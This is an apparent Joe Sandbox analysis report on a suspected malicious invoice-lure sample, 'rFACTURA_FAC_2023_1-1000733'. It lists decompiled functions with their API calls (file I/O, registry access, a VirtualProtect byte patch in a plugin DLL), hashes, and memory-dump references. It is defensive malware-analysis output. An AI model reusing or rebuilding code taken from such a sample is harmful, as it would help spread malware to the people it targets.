Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D

Uniqueness

Uniqueness Score: -1.00%

Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061BF(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004061A6();
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027e9
0x004027e9
0x004027ea
0x004027f2
0x004027f7
0x004027f8
0x00402807
0x00402810
0x00402a61
0x00402a62
0x00402a65
0x00402a65
0x00402810
0x00402ac2
0x00402ace

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
Instruction ID: 21d8c208f5d5b54c8d66c8a0ecd09dde93b5cc4591d01b86724f3e283dce4822
Opcode Fuzzy Hash: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
Instruction Fuzzy Hash: B0E06D72A00104AEDB11EBA5AE498AE7779EB80304B18803BF101F51D2CA790D128A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402C37(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401749
0x0040174f
0x00401751
0x00402853
0x0040285a
0x0040285a
0x00402ac2
0x00402ace

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 875acb00c645770f213fe7cf4565295393cc7a65273a1ece8f838635e2e5a846
Instruction ID: 1a21f3817f07a007d07fb30ace0b1820adccec601593f7c7bbd26e2b342b2bae
Opcode Fuzzy Hash: 875acb00c645770f213fe7cf4565295393cc7a65273a1ece8f838635e2e5a846
Instruction Fuzzy Hash: 33E048B2704104AAD750DBA4DE49AAA7758DF40368B20853AF111E51C1D6B45941976D

Uniqueness

Uniqueness Score: -1.00%

Function 004060FA Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060FA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406051(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406104
0x0040610d
0x00406123
0x00000000
0x00406123
0x00406111
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406123

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 1ce12e5a620d0377d06846f84a02a75369475120c61fa63bf0211ee428df1362
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 67E0E6B2010109BEDF099F50DD0AD7B371DE704704F01492EFA06D4051E6B5E9706B74

Uniqueness

Uniqueness Score: -1.00%

Function 00405E03 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E03(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e07
0x00405e17
0x00405e1f
0x00000000
0x00405e26
0x00000000
0x00405e28

APIs

WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,?,00000000), ref: 00405E17

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD4 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DD4(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405dd8
0x00405de8
0x00405df0
0x00000000
0x00405df7
0x00000000
0x00405df9

APIs

ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403305,00000000,00000000,0040314C,?,?,00000000,00000000,00000000), ref: 00405DE8

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, "true", 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027cb
0x100027d0
0x100027e0
0x100027e8
0x100027ef
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x1000280d
0x10002815

APIs

VirtualProtect.KERNELBASE(1000405C,?,00000040,1000404C), ref: 100027E0

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19

Uniqueness

Uniqueness Score: -1.00%

Function 004060CC Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060CC(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406051(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060d6
0x004060dd
0x004060f0
0x00000000
0x004060f0
0x004060e1
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
Instruction ID: 129b57beed9750de1dc8ac5f086523220a35585882bce30df6ddda6966387252
Opcode Fuzzy Hash: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
Instruction Fuzzy Hash: DFD01272B04104DBDB51DBE4AF0859D72A5AB50364B208577E101F11D1DABD89549B19

Uniqueness

Uniqueness Score: -1.00%

Function 004041F4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041F4(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextW(_v4, _v0 + 0x3e8, E00406281(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}

0x0040420e
0x00404213

APIs

SetDlgItemTextW.USER32(?,?,00000000), ref: 0040420E

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ItemText
String ID:
API String ID: 3367045223-0
Opcode ID: 73c06e2a9123b891731a7ebfb9029f8f008127f7581a586f7a1d4e0a57963b9e
Instruction ID: f5da9590e85ea14362a2b992ac95bea4d8dfad4da802ef44e2657ae46e782bfa
Opcode Fuzzy Hash: 73c06e2a9123b891731a7ebfb9029f8f008127f7581a586f7a1d4e0a57963b9e
Instruction Fuzzy Hash: 13C04C76548200BFD682B755CC42F1FB799EF94315F04C52EB59DE11D1CA3584319A26

Uniqueness

Uniqueness Score: -1.00%

Function 00404240 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404240(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a79f8; // 0x60020
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404240
0x00404247
0x00404252
0x00000000
0x00404252
0x00404258

APIs

SendMessageW.USER32(00060020,00000000,00000000,00000000), ref: 00404252

Memory Dump Source

